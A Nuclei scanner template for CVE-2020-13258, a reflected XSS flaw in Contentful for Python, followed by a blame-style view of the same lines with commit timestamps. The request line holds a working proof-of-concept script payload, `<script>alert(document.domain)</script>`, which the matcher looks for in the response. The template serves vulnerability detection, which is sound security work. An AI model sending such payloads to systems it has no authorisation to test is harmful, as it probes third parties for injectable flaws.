nuclei-templates/cves/2020/CVE-2020-13258.yaml

id: CVE-2020-13258

info:
  name: Contentful reflected XSS
  author: pikpikcu
  severity: medium
  description: Contentful through 2020-05-21 for Python allows reflected XSS.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258
  tags: cve,cve2020,contentful,xss

requests:
  - raw:
      - |
        GET /?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "<evil><script>alert(document.domain)</script>"
Create CVE-2020-13258.yaml 2022-01-07 02:49:47 +00:00			`id: CVE-2020-13258`

			`info:`
			`name: Contentful reflected XSS`
			`author: pikpikcu`
			`severity: medium`
			`description: Contentful through 2020-05-21 for Python allows reflected XSS.`
			`reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258`
			`tags: cve,cve2020,contentful,xss`
lint fixes 2022-01-07 07:34:40 +00:00
Create CVE-2020-13258.yaml 2022-01-07 02:49:47 +00:00			`requests:`
lint fixes 2022-01-07 07:34:40 +00:00			`- raw:`
			`- \|`
			`GET /?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1`
			`Host: {{Hostname}}`
Create CVE-2020-13258.yaml 2022-01-07 02:49:47 +00:00
			`matchers:`
			`- type: word`
			`words:`
			`- "<evil><script>alert(document.domain)</script>"`